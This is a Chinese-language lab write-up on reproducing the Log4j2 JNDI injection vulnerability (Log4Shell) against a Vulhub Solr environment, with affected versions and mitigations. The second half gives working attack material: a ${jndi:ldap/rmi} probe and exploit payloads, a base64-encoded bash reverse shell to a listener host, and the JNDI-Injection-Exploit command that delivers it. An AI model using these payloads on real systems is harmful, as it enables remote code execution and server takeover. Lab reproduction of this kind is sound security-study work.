log4j是开源的java存储日志的框架,一般都是大企业用,小企业自带的日志功能足够使用,Log4j2是默认支持解析ldap/rmi协议的,打印的日志中包括ldap/rmi协议都行。
具体介绍参考以下文章:
log4j2---基于vulhub的log4j2漏洞复现---反弹shell_繁华宛若浮云 - 致知学习-PC万里
log4j日志框架的使用_log4j是apache的一个开源日志框架,通过log4j我们可以将程序中的日志信息输出到控_浪里小白狼(鹤)的博客-CSDN博客
影响版本:apache log4j 2.2.0-2.14.1版本
1、升级到2.17.0版本以上
2、阻止使用JNDI来加载远程资源。适用于无法立即升级到修复版本在Log4j配置中禁用使用JNDI来加载远程资源来减少风险。
3、在log4j2.xml文件中添加安全策略配置,启用安全策略来限制代码执行
4、清除受影响系统的缓存。通过清除 Log4j 的上下文选择器缓存来实现确保新的配置生效
搭建一个vulnhub靶场,靶场相关内容详见:
Vulhub - Docker-Compose file for vulnerability environmentVulhub是一个基于docker和docker-compose的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。https://vulhub.org/#/environments/Vulhub - Docker-Compose file for vulnerability environmentVulhub是一个基于docker和docker-compose的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。https://vulhub.org/
git clone https://github.com/vulhub/vulhub.git
找到log4j下面的漏洞目录输入
docker-compose up -d
如果docker-compose提示未找到命令需要安装一下,
参考文章:docker-compose安装-CSDN博客 或者Docker高级篇(DockerCompose详解)-云原生核心 - 知乎
可以看到漏洞已经启动
环境搭建好了:是IP:端口,本次使用的IP是134,端口8983,所以连接
JNDI是Java平台的一个标准扩展,提供了一组接口、类和关于命名空间的概念
构造一个语句${jndi:ldap://fe4f4071e4.ipv6.1433.eu.org./exp}在上面搭建的网站上面输入,如果有回显说明存在log4j漏洞。
fe4f4071e4.ipv6.1433.eu.org.是用dig.pm构造的地址,
创建一个可交互的bash和一个到192.168.246.130:2333的TCP链接,然后将bash的输入输出错误都重定向到在192.168.246.130:2333监听的进程。
bash -i >& /dev/tcp/192.168.246.130/2333 0>&1 用base64加密
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjI0Ni4xMzAvMjMzMyAwPiYx
其中130是接收的IP,2333是监听端口
可以参考文章:Log4Shell漏洞学习 - 知乎
使用方法:java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "要执行的命令" -A " IP
命令是要对受害机执行的内容,比如本次是反弹命令,
IP是收集者的IP,
获取 jndi 工具开启ldap和rmi监听服务
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjI0Ni4xMzAvMjMzMyAwPiYx}|{base64,-d}|{bash,-i}" -A 192.168.246.130
工具安装参考:JNDI-Injection-Exploit工具安装-CSDN博客
JNDI支持的服务主要有:DNS、LDAP、CORBA、RMI等。简单从安全角度来看待JNDI就是Java中的一组接口,在其所支持的服务中最常用的就是RMI和LDAP服务。
RMI:远程方法调用注册表
LDAP:轻量级目录访问协议
通过这两种协议可以使目标服务器加载远程Class文件,攻击者通过构造Class文件来达到RCE的效果
${jndi:rmi://192.168.246.130:1099/jkgiaz}
http://192.168.246.134:8983/solr/admin/cores?action=${jndi:rmi://192.168.246.130:1099/jkgiaz}